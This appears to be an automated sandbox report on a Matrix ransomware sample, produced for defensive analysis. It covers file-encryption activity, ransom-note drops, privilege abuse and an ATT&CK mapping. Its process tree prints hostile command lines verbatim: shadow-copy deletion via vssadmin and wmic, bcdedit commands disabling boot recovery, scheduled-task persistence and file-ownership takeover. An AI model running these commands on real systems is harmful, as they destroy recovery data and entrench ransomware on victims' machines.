66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right.gif 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MEIPreload\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_zh_CN.jar 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-ul-phn.xrm-ms 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\over-arrow-navigation.svg 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nb-no\ui-strings.js 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\ui-strings.js 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC.HXS 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN001.XML 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBLR6.CHM 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription2-pl.xrm-ms 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ppd.xrm-ms 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\ui-strings.js 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProVL_MAK-ul-oob.xrm-ms 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial2-ppd.xrm-ms 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1020 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3908 vssadmin.exe 740 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1692 powershell.exe 1692 powershell.exe 3248 dL2ZWDdC64.exe 3248 dL2ZWDdC64.exe 3248 dL2ZWDdC64.exe 3248 dL2ZWDdC64.exe 3248 dL2ZWDdC64.exe 3248 dL2ZWDdC64.exe 3248 dL2ZWDdC64.exe 224 powershell.exe 224 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 3248 dL2ZWDdC64.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
description pid Process Token: SeDebugPrivilege 1692 powershell.exe Token: SeTakeOwnershipPrivilege 3796 takeown.exe Token: SeDebugPrivilege 3248 dL2ZWDdC64.exe Token: SeLoadDriverPrivilege 3248 dL2ZWDdC64.exe Token: SeBackupPrivilege 3568 vssvc.exe Token: SeRestorePrivilege 3568 vssvc.exe Token: SeAuditPrivilege 3568 vssvc.exe Token: SeIncreaseQuotaPrivilege 3516 WMIC.exe Token: SeSecurityPrivilege 3516 WMIC.exe Token: SeTakeOwnershipPrivilege 3516 WMIC.exe Token: SeLoadDriverPrivilege 3516 WMIC.exe Token: SeSystemProfilePrivilege 3516 WMIC.exe Token: SeSystemtimePrivilege 3516 WMIC.exe Token: SeProfSingleProcessPrivilege 3516 WMIC.exe Token: SeIncBasePriorityPrivilege 3516 WMIC.exe Token: SeCreatePagefilePrivilege 3516 WMIC.exe Token: SeBackupPrivilege 3516 WMIC.exe Token: SeRestorePrivilege 3516 WMIC.exe Token: SeShutdownPrivilege 3516 WMIC.exe Token: SeDebugPrivilege 3516 WMIC.exe Token: SeSystemEnvironmentPrivilege 3516 WMIC.exe Token: SeRemoteShutdownPrivilege 3516 WMIC.exe Token: SeUndockPrivilege 3516 WMIC.exe Token: SeManageVolumePrivilege 3516 WMIC.exe Token: 33 3516 WMIC.exe Token: 34 3516 WMIC.exe Token: 35 3516 WMIC.exe Token: 36 3516 WMIC.exe Token: SeIncreaseQuotaPrivilege 3516 WMIC.exe Token: SeSecurityPrivilege 3516 WMIC.exe Token: SeTakeOwnershipPrivilege 3516 WMIC.exe Token: SeLoadDriverPrivilege 3516 WMIC.exe Token: SeSystemProfilePrivilege 3516 WMIC.exe Token: SeSystemtimePrivilege 3516 WMIC.exe Token: SeProfSingleProcessPrivilege 3516 WMIC.exe Token: SeIncBasePriorityPrivilege 3516 WMIC.exe Token: SeCreatePagefilePrivilege 3516 WMIC.exe Token: SeBackupPrivilege 3516 WMIC.exe Token: SeRestorePrivilege 3516 WMIC.exe Token: SeShutdownPrivilege 3516 WMIC.exe Token: SeDebugPrivilege 3516 WMIC.exe Token: SeSystemEnvironmentPrivilege 3516 WMIC.exe Token: SeRemoteShutdownPrivilege 3516 WMIC.exe Token: SeUndockPrivilege 3516 WMIC.exe Token: SeManageVolumePrivilege 3516 WMIC.exe Token: 33 3516 WMIC.exe Token: 34 3516 WMIC.exe Token: 35 3516 WMIC.exe Token: 36 3516 WMIC.exe Token: SeDebugPrivilege 224 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 176 wrote to memory of 3796 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 58 PID 176 wrote to memory of 3796 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 58 PID 176 wrote to memory of 3796 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 58 PID 176 wrote to memory of 2536 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 60 PID 176 wrote to memory of 2536 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 60 PID 176 wrote to memory of 2536 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 60 PID 176 wrote to memory of 1132 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 70 PID 176 wrote to memory of 1132 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 70 PID 176 wrote to memory of 1132 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 70 PID 1132 wrote to memory of 1692 1132 cmd.exe 72 PID 1132 wrote to memory of 1692 1132 cmd.exe 72 PID 1132 wrote to memory of 1692 1132 cmd.exe 72 PID 176 wrote to memory of 4044 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 74 PID 176 wrote to memory of 4044 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 74 PID 176 wrote to memory of 4044 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 74 PID 176 wrote to memory of 3416 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 77 PID 176 wrote to memory of 3416 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 77 PID 176 wrote to memory of 3416 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 77 PID 3416 wrote to memory of 2724 3416 cmd.exe 78 PID 3416 wrote to memory of 2724 3416 cmd.exe 78 PID 3416 wrote to memory of 2724 3416 cmd.exe 78 PID 4044 wrote to memory of 3756 4044 cmd.exe 79 PID 4044 wrote to memory of 3756 4044 cmd.exe 79 PID 4044 wrote to memory of 3756 4044 cmd.exe 79 PID 4044 wrote to memory of 3152 4044 cmd.exe 80 PID 4044 wrote to memory of 3152 4044 cmd.exe 80 PID 4044 wrote to memory of 3152 4044 cmd.exe 80 PID 4044 wrote to memory of 2920 4044 cmd.exe 81 PID 4044 wrote to memory of 2920 4044 cmd.exe 81 PID 4044 wrote to memory of 2920 4044 cmd.exe 81 PID 176 wrote to memory of 1116 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 83 PID 176 wrote to memory of 1116 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 83 PID 176 wrote to memory of 1116 176 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 83 PID 1116 wrote to memory of 3444 1116 cmd.exe 85 PID 1116 wrote to memory of 3444 1116 cmd.exe 85 PID 1116 wrote to memory of 3444 1116 cmd.exe 85 PID 1116 wrote to memory of 3428 1116 cmd.exe 86 PID 1116 wrote to memory of 3428 1116 cmd.exe 86 PID 1116 wrote to memory of 3428 1116 cmd.exe 86 PID 1116 wrote to memory of 3796 1116 cmd.exe 87 PID 1116 wrote to memory of 3796 1116 cmd.exe 87 PID 1116 wrote to memory of 3796 1116 cmd.exe 87 PID 1116 wrote to memory of 1800 1116 cmd.exe 88 PID 1116 wrote to memory of 1800 1116 cmd.exe 88 PID 1116 wrote to memory of 1800 1116 cmd.exe 88 PID 1800 wrote to memory of 260 1800 cmd.exe 89 PID 1800 wrote to memory of 260 1800 cmd.exe 89 PID 1800 wrote to memory of 260 1800 cmd.exe 89 PID 2724 wrote to memory of 1648 2724 wscript.exe 90 PID 2724 wrote to memory of 1648 2724 wscript.exe 90 PID 2724 wrote to memory of 1648 2724 wscript.exe 90 PID 1648 wrote to memory of 1020 1648 cmd.exe 92 PID 1648 wrote to memory of 1020 1648 cmd.exe 92 PID 1648 wrote to memory of 1020 1648 cmd.exe 92 PID 260 wrote to memory of 3248 260 dL2ZWDdC.exe 93 PID 260 wrote to memory of 3248 260 dL2ZWDdC.exe 93 PID 2724 wrote to memory of 1924 2724 wscript.exe 94 PID 2724 wrote to memory of 1924 2724 wscript.exe 94 PID 2724 wrote to memory of 1924 2724 wscript.exe 94 PID 1924 wrote to memory of 1200 1924 cmd.exe 96 PID 1924 wrote to memory of 1200 1924 cmd.exe 96 PID 1924 wrote to memory of 1200 1924 cmd.exe 96 PID 3380 wrote to memory of 3908 3380 cmd.exe 99 PID 3380 wrote to memory of 3908 3380 cmd.exe 99 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3444 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe"C:\Users\Admin\AppData\Local\Temp\66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:176 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe" "C:\Users\Admin\AppData\Local\Temp\NWvRl3IN.exe"2⤵PID:3796
-
-
C:\Users\Admin\AppData\Local\Temp\NWvRl3IN.exe"C:\Users\Admin\AppData\Local\Temp\NWvRl3IN.exe" -n2⤵
- Executes dropped EXE
PID:2536
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\WIb105c5.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\E1anmCsT.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\E1anmCsT.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:3756
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:3152
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\27hNK43v.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\27hNK43v.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\9JN9p7fh.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\9JN9p7fh.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1200
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sz6U5mIr.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Views/modifies file attributes
PID:3444
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:3428
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dL2ZWDdC.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Users\Admin\AppData\Local\Temp\dL2ZWDdC.exedL2ZWDdC.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:260 -
C:\Users\Admin\AppData\Local\Temp\dL2ZWDdC64.exedL2ZWDdC.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3248
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\9JN9p7fh.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:3908
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:224 -
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:740
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:1776
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:208
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:3332
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3568
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
2